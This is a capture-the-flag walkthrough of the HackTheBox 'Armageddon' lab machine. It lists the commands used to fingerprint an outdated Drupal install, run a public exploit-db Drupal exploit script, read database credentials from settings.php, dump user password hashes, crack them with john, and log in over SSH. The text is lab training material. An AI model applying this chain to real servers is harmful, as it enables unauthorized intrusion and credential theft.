HackTheBox : Armageddon Walkthrough
Step 1:
Let’s scan for open ports with Nmap
Command: nmap -A 10.10.10.233
We see open ports here:
22/tcp-SSH port
80/tcp-HTTP port
Step 2:
Lets check the http site on port 80:
If we look at the place where ‘CHANGELOG.txt’ is written in port 80, we will learn the version of Drupal.
Step 3:
Now let’s find exploit for Drupal 7.56
Command: searchspolit Drupal 7.56
Step 4:
Let’s infiltrate the system now
Command: ruby /usr/share/exploitdb/exploits/php/webapps/44449.rb 10.10.10.233
Step 5:
Let’s look inside
Command: ls
Now let’s look at all the files
Command: find
Now let’s check all the files and the file you see contains some information we need.
Let’s check the file
Command: cat /sites/default/settings.php
Step 6:
Let’s explore the tables in the database!
Command: mysql -u ****** -p************** -D drupal -e ‘show tables;’
When we look at the whole list, we see a list of ‘users’ with possible names and passwords.
Lets check the users list!
Command: mysql -u ********* -p****************** -D drupal -e ‘select * from users;’
We get 2 users and password hashes one of which is an admin!
You can crack this password with the ‘john’ tool.
Step 7:
Now let’s connect to ssh-a with the information we have.
Command : ssh username@10.10.10.233
We are in
Checking the file system we have user.txt our first flag!